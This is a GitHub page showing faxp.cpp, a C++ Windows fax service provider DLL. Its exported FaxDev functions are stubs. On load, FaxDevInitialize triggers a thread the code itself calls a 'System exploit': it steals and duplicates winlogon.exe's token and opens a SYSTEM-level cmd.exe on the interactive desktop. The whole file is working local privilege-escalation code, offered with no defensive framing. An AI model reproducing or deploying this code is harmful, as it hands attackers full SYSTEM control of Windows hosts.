-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathfaxp.cpp
More file actions
106 lines (94 loc) · 3.98 KB
/
Copy pathfaxp.cpp
File metadata and controls
106 lines (94 loc) · 3.98 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#include <windows.h>
#include <wtsapi32.h>
#include <userenv.h>
#include <tlhelp32.h>
#include <stdio.h>
#pragma comment(lib, "wtsapi32.lib")
#pragma comment(lib, "userenv.lib")
void log(const wchar_t* fmt, ...) {
FILE* f = _wfopen(L"C:\\Users\\Public\\faxp.log", L"a+");
if (f) {
va_list ap; va_start(ap, fmt);
vfwprintf(f, fmt, ap); va_end(ap);
fwprintf(f, L"\n");
fclose(f);
}
}
DWORD gwid(DWORD sid) {
DWORD pid = 0;
HANDLE hs = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hs != INVALID_HANDLE_VALUE) {
PROCESSENTRY32W pe = { sizeof(pe) };
if (Process32FirstW(hs, &pe)) {
do {
if (_wcsicmp(pe.szExeFile, L"winlogon.exe") == 0) {
DWORD s;
if (ProcessIdToSessionId(pe.th32ProcessID, &s) && s == sid) {
pid = pe.th32ProcessID;
break;
}
}
} while (Process32NextW(hs, &pe));
}
CloseHandle(hs);
}
return pid;
}
DWORD WINAPI trig(LPVOID lpParam) {
log(L"trig: System exploit started.");
DWORD sid = WTSGetActiveConsoleSessionId();
if (sid == 0xFFFFFFFF) sid = 1;
log(L"Target Session: %lu", sid);
DWORD pid = gwid(sid);
if (!pid) { log(L"Winlogon not found in session %lu", sid); return 0; }
log(L"Winlogon PID: %lu", pid);
HANDLE hp = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
if (!hp) { log(L"OpenProcess(winlogon) failed: %lu", GetLastError()); return 0; }
HANDLE ht = NULL;
if (OpenProcessToken(hp, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &ht)) {
HANDLE hdt = NULL;
if (DuplicateTokenEx(ht, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hdt)) {
STARTUPINFOW si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.lpDesktop = (LPWSTR)L"winsta0\\default";
LPVOID pe = NULL;
CreateEnvironmentBlock(&pe, hdt, FALSE);
wchar_t c[] = L"C:\\Windows\\System32\\cmd.exe /k echo SNEK ERIS: SYSTEM SHELL RECOVERED";
if (CreateProcessAsUserW(hdt, NULL, c, NULL, NULL, FALSE,
NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT,
pe, NULL, &si, &pi)) {
log(L"SUCCESS! Shell PID %lu", pi.dwProcessId);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
} else {
log(L"CreateProcessAsUserW failed: %lu", GetLastError());
}
if (pe) DestroyEnvironmentBlock(pe);
CloseHandle(hdt);
} else {
log(L"DuplicateTokenEx failed: %lu", GetLastError());
}
CloseHandle(ht);
} else {
log(L"OpenProcessToken failed: %lu", GetLastError());
}
CloseHandle(hp);
return 0;
}
extern "C" {
__declspec(dllexport) BOOL WINAPI FaxDevInitialize(HINSTANCE h, HANDLE hp, void* lc, void* sc) {
log(L"FaxDevInitialize: Triggering payload.");
CreateThread(NULL, 0, trig, NULL, 0, NULL);
return TRUE;
}
__declspec(dllexport) BOOL WINAPI FaxDevVirtualDeviceCreation(PDWORD dc, LPWSTR dnp, PDWORD dip, HANDLE cp, ULONG_PTR ck) {
*dc = 1; wcscpy(dnp, L"SNEK Virtual Fax"); *dip = 0x1337; return TRUE;
}
__declspec(dllexport) BOOL WINAPI FaxDevStartJob(HANDLE lh, DWORD di, PHANDLE fh, HANDLE cp, ULONG_PTR ck) { *fh = (HANDLE)1; return TRUE; }
__declspec(dllexport) BOOL WINAPI FaxDevEndJob(HANDLE fh) { return TRUE; }
__declspec(dllexport) BOOL WINAPI FaxDevSend(HANDLE fh, void* fs, void* fst) { return TRUE; }
__declspec(dllexport) BOOL WINAPI FaxDevReceive(HANDLE fh, HANDLE ch, void* fr) { return TRUE; }
__declspec(dllexport) BOOL WINAPI FaxDevReportStatus(HANDLE fh, void* fst, DWORD fss, PDWORD fsr) { if (fsr) *fsr = 48; return TRUE; }
__declspec(dllexport) BOOL WINAPI FaxDevAbortOperation(HANDLE fh) { return TRUE; }
}
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID res) { return TRUE; }